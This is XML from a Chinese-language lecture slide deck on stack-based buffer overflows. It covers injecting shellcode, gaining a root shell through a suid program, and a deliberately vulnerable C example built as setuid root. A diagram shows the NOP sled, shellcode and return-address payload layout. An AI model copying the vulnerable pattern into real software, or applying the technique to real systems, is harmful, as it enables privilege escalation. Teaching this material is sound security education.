                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3307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0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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="27"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07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5ADB6895-5C83-47B4-8A74-CBA38137E5E9}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
              <a:pPr algn="l">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>基于堆栈的溢出</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18436" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="1844675"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>由于通过缓冲区溢出的方法修改返回地址以改变执行流程是可能的，所以这时唯一需要的是一些有助于执行的东西，也就是我们需要注入的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>关于字节注入码有几点严格的限制：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>必须是自包含的；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在指令中避免一些特殊字符，使之看起来更像数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3839396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60F1E2A6-93A5-41C1-9389-DFCC67E1BCC5}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
              <a:pPr algn="l">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>基于堆栈的溢出</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19460" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>最常见的一段字节码称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。是用来衍生</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的字节码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>如果某个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>suid root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>程序被欺骗去执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，攻击者就会拥有一个具有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>特权的用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，而系统认为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>suid root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>程序仍然在正常运行；</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1967268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539C3345-B316-461A-B712-FDC5F491E65D}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
              <a:pPr algn="l">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>一个例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20484" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900113" y="1862138"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" smtClean="0"/>
              <a:t>vuln.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" smtClean="0"/>
              <a:t>Int main (int argc,char *argv[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0"/>
              <a:t>Char buffer[500]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0"/>
              <a:t>Strcpy(buffer,argv[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0"/>
              <a:t>Return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" smtClean="0"/>
              <a:t>$Gcc –o vuln vuln.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" smtClean="0"/>
              <a:t>$./vuln.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" smtClean="0"/>
              <a:t>$sudo chown root vuln</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" smtClean="0"/>
              <a:t>$sudo chmod +s vuln</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" smtClean="0"/>
              <a:t>$ls –l vuln</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" smtClean="0"/>
              <a:t>-rwsr-sr-x  1 root  users </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4164891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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>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B90DD9E5-F7A0-47A1-AE50-2F36FD07E7DD}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
              <a:pPr algn="l">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274435" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="1628775"/>
            <a:ext cx="4024312" cy="4249738"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>填充</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>找到返回地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>重复返回地址填充</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="274436" name="Group 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="676275" y="4025900"/>
          <a:ext cx="7758113" cy="647700"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2587625">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2582863">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2587625">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>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Nop sled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Shellcode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重复返回地址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7056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4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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="274436"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="diamond(in)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="27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9032101A-F387-4E7B-946B-40F25EFB7A1B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
              <a:pPr algn="l">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22532" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3995738" y="2565400"/>
            <a:ext cx="1439862"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22533" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3995738" y="3141663"/>
            <a:ext cx="14398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22534" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3995738" y="3716338"/>
            <a:ext cx="1439862" cy="576262"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050"/>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zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>子程序变量</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22535" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3995738" y="4292600"/>
            <a:ext cx="1439862" cy="576263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050"/>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zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>返回地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22536" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3995738" y="4868863"/>
            <a:ext cx="14398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zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="272777"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>参数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22537" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4284663" y="1916113"/>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accent1"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="272777"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>堆栈</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3515908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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13716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l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{140AFF62-EFCE-45C7-A6BD-1875870D2342}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
              <a:pPr algn="l">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23555" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23556" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3995738" y="2565400"/>
            <a:ext cx="1439862"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
        <p:nvSpPr>
          <p:cNvPr id="23557" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3995738" y="3141663"/>
            <a:ext cx="14398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en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="272777"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>NOP sled</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="272777"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23558" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3995738" y="3716338"/>
            <a:ext cx="14398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en-US" altLang="zh-CN" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="272777"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="272777"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23559" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3995738" y="4292600"/>
            <a:ext cx="1439862" cy="57626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zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="272777"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>重复的返回地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23560" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3995738" y="4868863"/>
            <a:ext cx="1439862" cy="5762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buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="272777"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>参数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23561" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4284663" y="1916113"/>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50000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="272777"/>
                </a:solidFill>
